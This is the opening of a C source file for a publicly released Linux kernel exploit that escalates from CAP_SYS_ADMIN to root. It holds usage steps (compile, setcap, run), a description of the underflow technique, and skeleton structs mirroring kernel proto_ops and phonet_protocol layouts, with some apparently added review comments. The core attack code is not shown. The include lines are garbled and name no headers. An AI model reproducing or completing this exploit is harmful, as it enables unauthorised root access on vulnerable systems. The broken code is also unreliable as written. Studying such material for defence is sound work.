/*
* Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)
* by Joe Sylve
* @jtsylve on twitter
*
* Released: Jan 7, 2011
*
* Based on the bug found by Dan Rosenberg (@djrbliss)
* only loosely based on his exploit http://www.exploit-db.com/exploits/15916/
*
* Usage:
* gcc -w caps-to-root2.c -o caps-to-root2
* sudo setcap cap_sys_admin+ep caps-to-root2
* ./caps-to-root2
*
* Kernel Version >= 2.6.34 (untested on earlier versions)
*
* Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit
*
* This exploit takes advantage of the same underflow as the original,
* but takes a different approach. Instead of underflowing into userspace
* (which doesn't work on 64-bit systems and is a lot of work), I underflow
* to some static values inside of the kernel which are referenced as pointers
* to userspace. This method is pretty simple and seems to be reliable.
*/
#include |
#include |
#include |
#include |
#include |
#include |
// Skeleton structures mirroring the kernel structures this program spoofs
/*
 * Userspace stand-in for the kernel's proto_ops table.
 *
 * Only the field layout matters here: buffer1/buffer2 are presumably opaque
 * padding so that `ioctl` lands at the same offset as the kernel's own
 * function-pointer slot, and the (void *, int, long) signature is just a
 * loosely typed placeholder rather than the real kernel prototype.
 *
 * NOTE(review): the offsets are specific to the kernel versions named in the
 * file header (>= 2.6.34, tested on Ubuntu 10.10 32/64-bit); on any other
 * kernel or build this layout should be assumed wrong. For defenders, the
 * precondition shown in the Usage section is a binary carrying a file
 * capability (cap_sys_admin+ep); auditing installed binaries for file
 * capabilities (e.g. `getcap -r /`) surfaces that condition.
 */
struct proto_ops_skel {
int family;                        /* first slot, matches kernel proto_ops.family position (assumed) */
void *buffer1[8];                  /* padding: 8 pointer-sized slots before ioctl */
int (*ioctl)( void *, int , long ); /* the slot this program overwrites/points at */
void *buffer2[12];                 /* padding: 12 pointer-sized slots after ioctl */
};
/*
 * Userspace stand-in for the kernel's phonet_protocol registration entry.
 *
 * Declared with untyped pointers so no kernel headers are required; only the
 * three-field order (ops, prot, sock_type) is relied on. `ops` is presumably
 * what gets paired with a proto_ops_skel — TODO confirm against the rest of
 * the file, which is not visible here.
 *
 * NOTE(review): like proto_ops_skel, this layout is tied to the kernel
 * versions listed in the file header and should not be assumed to hold
 * elsewhere.
 */
struct phonet_protocol_skel {
void *ops;      /* pointer to the protocol's proto_ops table */
void *prot;     /* pointer to the protocol's proto structure (opaque here) */
int sock_type;  /* socket type this entry is registered for */
};